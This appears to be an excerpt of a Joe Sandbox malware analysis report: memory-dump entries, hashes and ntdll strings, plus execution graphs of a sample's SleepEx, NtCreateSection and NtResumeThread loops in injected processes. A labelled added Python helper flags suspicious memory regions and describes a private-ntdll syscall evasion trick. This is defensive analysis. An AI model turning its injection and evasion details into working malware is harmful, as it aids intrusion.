                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                    • API String ID: 3446177414-1222099010
                                                                                                                                                                                    • Opcode ID: 245bc78671ce4998bdd7d9133eb9b12baaf7820f422ecb647832be0165fd65e4
                                                                                                                                                                                    • Instruction ID: 330f568de95a24f218afa03d092b4db173b94ad2f3281c0482be1380300ce62f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 245bc78671ce4998bdd7d9133eb9b12baaf7820f422ecb647832be0165fd65e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38310375202784AFF726CB28C408B49BBE4EF49764F454885E84197A91CFB9AB81CE51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$@
                                                                                                                                                                                    • API String ID: 3446177414-1194432280
                                                                                                                                                                                    • Opcode ID: bcb2505a23d24d377787b84e4ffabfc6118a03b6cebc72265abb53a181cbed69
                                                                                                                                                                                    • Instruction ID: 15f6120e82ab570a19a830750e154fff1ce440cd2ebaef6e3741340bc2800bfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb2505a23d24d377787b84e4ffabfc6118a03b6cebc72265abb53a181cbed69
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED814D75D012699BDB25CF54CC40BEEBBB8AF48714F1045DAAA09B7290EB709F85CF60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
• LdrpFindDllActivationContext, xrefs: 32593440, 3259346C
• Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32593439
• Querying the active activation context failed with status 0x%08lx, xrefs: 32593466
• minkernel\ntdll\ldrsnap.c, xrefs: 3259344A, 32593476
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
• API String ID: 3446177414-3779518884
• Opcode ID: f6503ff16543f0e9996595320bc7a9e8ffb8562178145fbbe78ae1ec55e7ceea
• Instruction ID: 9f6ba5815af90faf12049b3558ca0232e6a616e823f2d0405b9ba8ba0540cd68
• Opcode Fuzzy Hash: f6503ff16543f0e9996595320bc7a9e8ffb8562178145fbbe78ae1ec55e7ceea
• Instruction Fuzzy Hash: 0D312AB6940351FFF7119F06C844B5ABBA4FBC539AFA2816BD80267140DB60AFC0C6B1
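Added example (not part of the Joe Sandbox report or its IDA plugin): a small Python triage helper that decodes the fields of the Memory Dump Source names listed in these entries and combines them with the String ID values. The name layout is an assumption inferred from the values in this report: the three 8-digit fields after the base address, 00000040, 00001000 and 00020000, are exactly the winnt.h values PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE, so the helper treats them as the region's Protect, State and Type. A region that is private rather than MEM_IMAGE, writable and executable, reported as "based on PE: true", and carrying the minkernel\ntdll\... source-path literals that ntdll compiles into its debug prints is a module the sample copied into memory itself rather than one the image loader mapped; a private copy of ntdll is a common way to reach syscall stubs without passing through hooked exports, and is worth checking against the report's "Found direct / indirect Syscall" signature. The second, benign-looking entry and all function names are constructed for the example.

```python
"""Triage helper for Joe Sandbox "Memory Dump Source" entries (added example).

Assumption: the .sdmp name is laid out as
    <proc>.<dump>.<seq>.<base>.<protect>.<state>.<type>.<extra>.sdmp
with protect/state/type holding raw MEMORY_BASIC_INFORMATION values.
"""
import re
from dataclasses import dataclass, field

# winnt.h constants (exact values)
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
WRITE_EXEC_MASK = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)
NAME_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<dump>[0-9a-f]{8})\.(?P<seq>\d+)"
    r"\.(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})"
    r"\.(?P<type>[0-9a-f]{8})\.(?P<extra>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


@dataclass
class Region:
    proc: int
    base: int
    protect: int
    state: int
    mtype: int
    based_on_pe: bool
    strings: list = field(default_factory=list)


def parse_string_id(string_id):
    """Split a report 'String ID' value; the report joins entries with '$'."""
    return [s for s in string_id.split("$") if s]


def parse_source_line(line, string_id=""):
    """Decode one 'Source File: ..., Offset: ..., based on PE: ...' line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("not a Memory Dump Source line: %r" % line)
    n = NAME_RE.match(m["name"])
    if not n:
        raise ValueError("unexpected .sdmp name layout (assumed format): %r" % m["name"])
    return Region(
        proc=int(n["proc"], 16), base=int(n["base"], 16),
        protect=int(n["protect"], 16), state=int(n["state"], 16),
        mtype=int(n["type"], 16), based_on_pe=m["pe"].lower() == "true",
        strings=parse_string_id(string_id))


def region_kind(mtype):
    return {MEM_IMAGE: "MEM_IMAGE", MEM_MAPPED: "MEM_MAPPED",
            MEM_PRIVATE: "MEM_PRIVATE"}.get(mtype, "type 0x%x" % mtype)


def assess(region):
    """Return the findings a reviewer would want flagged for this region."""
    findings = []
    if region.state != MEM_COMMIT:
        return findings                      # not resident, nothing to judge
    if region.protect & WRITE_EXEC_MASK:
        findings.append("writable and executable pages (protect 0x%x)" % region.protect)
    if region.based_on_pe and region.mtype != MEM_IMAGE:
        findings.append("PE header in %s memory: not loaded by the image loader"
                        % region_kind(region.mtype))
    # ntdll's debug prints carry their __FILE__ literals; seeing them in a
    # non-image region means a copy of ntdll was placed there by the sample.
    if any(s.lower().startswith("minkernel\\ntdll\\") for s in region.strings):
        findings.append("ntdll debug-print source paths present: private copy of ntdll")
    return findings


# First entry is copied from this report; the second is a constructed contrast:
# PAGE_EXECUTE_READ (0x20) pages in a MEM_IMAGE (0x1000000) region, no strings.
REPORT_LINE = ("Source File: 00000002.00000002.1365528846.00000000324F0000.00000040"
               ".00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true")
REPORT_STRING_ID = (r'LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" '
                    r'failed with status 0x%08lx$Querying the active activation context '
                    r'failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c')
CONSTRUCTED_LINE = ("Source File: 00000002.00000002.1365528846.0000000077A00000.00000020"
                    ".00001000.01000000.00000000.sdmp, Offset: 77A00000, based on PE: true")


def triage():
    """Map region base -> findings for the two sample entries."""
    out = {}
    for line, sid in ((REPORT_LINE, REPORT_STRING_ID), (CONSTRUCTED_LINE, "")):
        r = parse_source_line(line, sid)
        out[r.base] = assess(r)
    return out


if __name__ == "__main__":
    for base, findings in triage().items():
        print("0x%08X: %s" % (base, "; ".join(findings) or "nothing notable"))
```

Run it against every Memory Dump Source line of a report and the entries that need manual review are the ones with more than one finding; an image-backed, execute-only region with no ntdll path strings produces none.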
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
• API String ID: 3446177414-3610490719
• Opcode ID: bb020546c48e0cc51b3095d7503fbcc2fb9e087d3025fe1aba510ca9271baa72
• Instruction ID: b82f7e0b09eead4b7b63942f6d4a9c03db21aaf74b6b52aec8f39603ce378954
• Opcode Fuzzy Hash: bb020546c48e0cc51b3095d7503fbcc2fb9e087d3025fe1aba510ca9271baa72
• Instruction Fuzzy Hash: D9910675284750AFFB16DB28C880B2EBBA5BF84744F440859E940DB286DB78FB41CBD1
APIs
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 32589F2E
• LdrpCheckModule, xrefs: 32589F24
• Failed to allocated memory for shimmed module list, xrefs: 32589F1C
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-161242083
• Opcode ID: dec029f60b4e3bd7013054b2003654c8836e77af6e67ebbfcbce36d8c2b83b9e
• Instruction ID: d13c8db52325562036045fa35db2fd649c5e12dcf580421ade235e272214f16b
• Opcode Fuzzy Hash: dec029f60b4e3bd7013054b2003654c8836e77af6e67ebbfcbce36d8c2b83b9e
• Instruction Fuzzy Hash: 3571A775A002059FEB09DF64C990BAEBBF4EF88308F54446AD905E7750EB74AB82CB54
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 60b0e436e9f10fe8ec9ee4e67edc0ceeebf5f9f18e9e911f841b694dca5663e0
• Instruction ID: a2102d1132ce1c71ce4da43aaba85fdc6f4002585f7f6a218ec0828afbdf9455
• Opcode Fuzzy Hash: 60b0e436e9f10fe8ec9ee4e67edc0ceeebf5f9f18e9e911f841b694dca5663e0
• Instruction Fuzzy Hash: E8E1D075901708DFDB25CFA9C980A9DFBF1BF88304F10492AE946E7660DB70AA41CF50
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
• Opcode ID: 8cd30f7f3a299fb4a5976e7265c32cc84aea5cf93185cd62690ec0e2eb8ec494
• Instruction ID: cd90f2291adbfab8383786bb0a677568c4b80ba58270f2f6321c26ddea4ec725
• Opcode Fuzzy Hash: 8cd30f7f3a299fb4a5976e7265c32cc84aea5cf93185cd62690ec0e2eb8ec494
• Instruction Fuzzy Hash: B2517C78701612EFEB08CE18C890A29BBE5BF8DB54B11456DD906D7B10DB72AE41CB82
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes$BaseInitThreadThunk
• String ID:
• API String ID: 4281723722-0
• Opcode ID: e279e610dab6a391dee987bce94e978125796d8f07ec3827be8709a6652c23bf
• Instruction ID: 5aa410c038192a07bc07a9f1705a53d90a18903a1b815743a7488f5b957078d0
• Opcode Fuzzy Hash: e279e610dab6a391dee987bce94e978125796d8f07ec3827be8709a6652c23bf
• Instruction Fuzzy Hash: E7312475E42258EFCB05DFA8D845A9DBBF0AF88321F10456AE511B7390DB356A81CF50
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: f721704d30f7301827fe544fe5aae07b1189f0e86d52c37dec54756cdceace1a
• Instruction ID: fe8a1d87516de07768287145cab55e5baca36befd6fcfaa90290be3e5e984a6a
• Opcode Fuzzy Hash: f721704d30f7301827fe544fe5aae07b1189f0e86d52c37dec54756cdceace1a
• Instruction Fuzzy Hash: EA323674901369DFEB29CF64C984BE9BBB0BB48304F4045E9D949A72C1DBB49B84CF91
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: HEAP: ${\2
• API String ID: 0-2341721578
• Opcode ID: 9e9cf89f5b122b33af52089f30f88e01a5a28d3b10c5460172859e5104ccd087
• Instruction ID: 6b410620da7b807f965981ba90c2dcf87b8a2d05a26c6e87f0ec5ecae48e8e76
• Opcode Fuzzy Hash: 9e9cf89f5b122b33af52089f30f88e01a5a28d3b10c5460172859e5104ccd087
• Instruction Fuzzy Hash: 74B1BE716093619FD711CF64D884A5BBBE5EFC4758F404A6EF994CB290EB30DA04CB92
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: 0$Flst
• API String ID: 0-758220159
• Opcode ID: 94efdefd1b79b22cc61999e5d3e533cb1b091455c66db56ea721793ec9df2236
• Instruction ID: 8a11fae98c211b7679d68277ab3a284ba7d8ed05e211355ce54645009ff54c89
• Opcode Fuzzy Hash: 94efdefd1b79b22cc61999e5d3e533cb1b091455c66db56ea721793ec9df2236
• Instruction Fuzzy Hash: E951CFB5E01248DFEB15CF96C48479DFBF4EF84756F24842ED4469B240EBB09A81CB90
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: ^Q2
                                                                                                                                                                                    • API String ID: 3446177414-3458373168
                                                                                                                                                                                    • Opcode ID: 8b3f709bdd2ced20095658eddb8d706d11306f1edd554866eb8901bc9af1b6ce
                                                                                                                                                                                    • Instruction ID: 0ce8f09471ac0ade335dbebb5f0183bdf8e1d2d27a9917141672405d95c33d2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b3f709bdd2ced20095658eddb8d706d11306f1edd554866eb8901bc9af1b6ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B41AFB9A40201DFEB05CF29D4805557BF5FF89750B54846AEC09DB361CB31FA81CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: 0$0
                                                                                                                                                                                    • API String ID: 3446177414-203156872
                                                                                                                                                                                    • Opcode ID: b6e2ffc8c058d9c2625f77734e0f981faac7490b03576bfdceca5981ecf9aa86
                                                                                                                                                                                    • Instruction ID: 0d7b7d02154b4f291f798e03cb05996b366e52d3a2fa73db0c26cd3ee7a298ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6e2ffc8c058d9c2625f77734e0f981faac7490b03576bfdceca5981ecf9aa86
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5417BB56097019FE700CF28C444A5ABBE4BF88358F004A2EF988DB301D771EB45CB86
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Q2$mQ2
                                                                                                                                                                                    • API String ID: 3446177414-1431127304
                                                                                                                                                                                    • Opcode ID: 9ac38d4c8e2bea83fbe222cc4d27100380fc9ee2136f40acde247f4cff274a91
                                                                                                                                                                                    • Instruction ID: eedbe6aa859636d1a82554e8e4a5006385286dcf2149b745fa05d77a86ce5625
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac38d4c8e2bea83fbe222cc4d27100380fc9ee2136f40acde247f4cff274a91
                                                                                                                                                                                    • Instruction Fuzzy Hash: EC11C3B6A01208AFDF11CF98D985ADEBBB8FF4C360F10401AF911B7240D775AA54CBA0

Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 30
Total number of Limit Nodes: 0
execution_graph 5227 411b670 5229 411b628 5227->5229 5228 411b725 SleepEx 5228->5229 5230 411b76f NtCreateSection 5228->5230 5229->5228 5231 411b62d 5229->5231 5230->5231 5238 411b6e8 5239 411b725 SleepEx 5238->5239 5240 411b71f 5239->5240 5241 411b76f NtCreateSection 5239->5241 5240->5239 5242 411b74c 5240->5242 5241->5242 5212 411fa6b 5214 411fa70 5212->5214 5213 411fb6f 5214->5213 5216 411b88d 5214->5216 5217 411b8b3 5216->5217 5218 411b8e1 SleepEx 5217->5218 5220 411b8d2 5217->5220 5218->5217 5221 411b915 5218->5221 5219 411b94e NtResumeThread 5219->5220 5220->5213 5221->5219 5221->5220 5232 411b6aa 5233 411b6cb 5232->5233 5236 411b710 5232->5236 5234 411b725 SleepEx 5235 411b76f NtCreateSection 5234->5235 5234->5236 5237 411b74c 5235->5237 5236->5234 5236->5237 5222 411b6ff 5224 411b6ad 5222->5224 5223 411b725 SleepEx 5223->5224 5225 411b76f NtCreateSection 5223->5225 5224->5222 5224->5223 5226 411b6cb 5224->5226 5225->5226

Control-flow Graph

control_flow_graph 0 411b670-411b671 1 411b673 0->1 2 411b6c4-411b6c9 0->2 3 411b678-411b67f 1->3 4 411b710-411b71e 2->4 5 411b6cb-411b6d8 2->5 7 411b681-411b69c 3->7 8 411b6a2-411b6a6 3->8 6 411b71f-411b72b SleepEx 4->6 11 411b72d-411b731 6->11 12 411b76f-411b7c4 NtCreateSection 6->12 7->8 8->2 10 411b628-411b62b 8->10 10->3 13 411b62d-411b65b 10->13 14 411b733-411b740 call 4128a5d 11->14 15 411b745-411b74a 11->15 16 411b7c6-411b7df 12->16 17 411b74c-411b753 12->17 14->15 15->6 15->17 16->17 22 411b7e5-411b824 16->22 20 411b755-411b76e 17->20 22->17 24 411b82a-411b868 22->24 24->17 26 411b86e-411b886 24->26 26->20
Strings
Memory Dump Source
• Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
Similarity
• API ID:
• String ID: 0$@$@
• API String ID: 0-3221051908
• Opcode ID: 23772eb120ee915ce1b95691db6e1b41989a63e0cf482548256b4cc0f84638c5
• Instruction ID: f67ba7619ef9a88e9f1532ab758d51ec512299be1fd4880ce59995a43e092073
• Opcode Fuzzy Hash: 23772eb120ee915ce1b95691db6e1b41989a63e0cf482548256b4cc0f84638c5
• Instruction Fuzzy Hash: 6A61BA71A28B188FCB15DF54D8816DABBE4FF58700F10026EE85A97291DB34E646CBC6

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
Similarity
• API ID: ResumeSleepThread
• String ID:
• API String ID: 1530989685-0
• Opcode ID: 3ccdf1dd1650dff53bd1ec06617559932113fcbfc937b47eff02d5e28373bae8
• Instruction ID: e3bf187de2e8856be03b25698bd50eb95785aad9b2a5adfc0f57081501b2549b
• Opcode Fuzzy Hash: 3ccdf1dd1650dff53bd1ec06617559932113fcbfc937b47eff02d5e28373bae8
• Instruction Fuzzy Hash: 0121B37061CB8D8FEB58EF6884956AAB7E0FB44314F01073EE99AC3290EB34F5518B45

Control-flow Graph

control_flow_graph 47 411b6ff-411b70a 48 411b6ad 47->48 49 411b70c-411b70e 47->49 50 411b6af-411b6c9 48->50 51 411b6fe 48->51 52 411b710-411b71e 49->52 50->52 54 411b6cb-411b6d8 50->54 51->47 53 411b71f-411b72b SleepEx 52->53 56 411b72d-411b731 53->56 57 411b76f-411b7c4 NtCreateSection 53->57 58 411b733-411b740 call 4128a5d 56->58 59 411b745-411b74a 56->59 60 411b7c6-411b7df 57->60 61 411b74c-411b753 57->61 58->59 59->53 59->61 60->61 65 411b7e5-411b824 60->65 63 411b755-411b76e 61->63 65->61 67 411b82a-411b868 65->67 67->61 69 411b86e-411b886 67->69 69->63
APIs
Memory Dump Source
• Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
Similarity
• API ID: CreateSectionSleep
• String ID:
• API String ID: 2866269021-0
• Opcode ID: a30f3fe63698082d7a2e4efaac99c8114b46f0a43e053e84e2d4b858ee7fa1e8
• Instruction ID: 684e4e3727648c3e72b99870f0a670c65a4b7d5248f1679ed43a6e42a93595e4
• Opcode Fuzzy Hash: a30f3fe63698082d7a2e4efaac99c8114b46f0a43e053e84e2d4b858ee7fa1e8
• Instruction Fuzzy Hash: 4D117A72D1CB148AD76A6F549C822E83752FF41311F6006B9C854575A2EB337452C2C6

Control-flow Graph

control_flow_graph 70 411b6e8-411b6fa 71 411b725-411b72b SleepEx 70->71 72 411b72d-411b731 71->72 73 411b76f-411b7c4 NtCreateSection 71->73 74 411b733-411b740 call 4128a5d 72->74 75 411b745-411b74a 72->75 76 411b7c6-411b7df 73->76 77 411b74c-411b753 73->77 74->75 75->77 79 411b71f-411b724 75->79 76->77 82 411b7e5-411b824 76->82 80 411b755-411b76e 77->80 79->71 82->77 84 411b82a-411b868 82->84 84->77 86 411b86e-411b886 84->86 86->80
APIs
Memory Dump Source
• Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
Similarity
• API ID: CreateSectionSleep
• String ID:
• API String ID: 2866269021-0
• Opcode ID: 0fb47c5ba29e04789db5c6a1a1884fb94d5299937d6a96ca76d543d2ddb73158
• Instruction ID: cb2bf4290a9e4c62af0b18e9c21f07dc718dd2ba6770222b4b69e65c7edcebef
• Opcode Fuzzy Hash: 0fb47c5ba29e04789db5c6a1a1884fb94d5299937d6a96ca76d543d2ddb73158
• Instruction Fuzzy Hash: 7DF0593290CB084BE7096F88E8822FE73D1FB45370F200236C465026A0F77AB06282C5
Memory Dump Source
• Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0dcadc640b22b38efd17b659c21168140e25948fbbf73ba5134c53d695fac3b5
• Instruction ID: ecd4c25c9ba7f136c729cb0e03845fe87d9e6d91df28b30018fba68c3431bfc0
• Opcode Fuzzy Hash: 0dcadc640b22b38efd17b659c21168140e25948fbbf73ba5134c53d695fac3b5
• Instruction Fuzzy Hash: B941D871619B0D4FD728AF68D0C12B6B3E1FB45304F50093DD996C33A2E770F8558685

Execution Graph

Execution Coverage: 0.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 9
Total number of Limit Nodes: 1

Control-flow Graph

• Executed
• Not Executed
APIs
• NtQueryInformationProcess.NTDLL ref: 04B2F1B7
Strings
Memory Dump Source
• Source File: 00000009.00000002.2900017391.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4b20000_grpconv.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 24af1654e36000b7d7e7fe176e5539e6920882dc5509bee690fe3562c6c2add7
• Instruction ID: 42e45b059948210d8876ec0a6ec896c397c79cc9fd7d009e70ad022b3e1f26da
• Opcode Fuzzy Hash: 24af1654e36000b7d7e7fe176e5539e6920882dc5509bee690fe3562c6c2add7
• Instruction Fuzzy Hash: E2023C70518A8C8FDFA9EF68C8946EE77E1FB99309F00465AE84AC7240DF34E641CB41

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 152 4ca34e0-4ca34ec LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7139a04fa1901482a7d7697ae16100445ec1f6514c6498500908a2cc6e49fe9c
• Instruction ID: 9cce3105dd96747ee2c641966da466f9c65e48150e924f0c0c5b9bf057239427
• Opcode Fuzzy Hash: 7139a04fa1901482a7d7697ae16100445ec1f6514c6498500908a2cc6e49fe9c
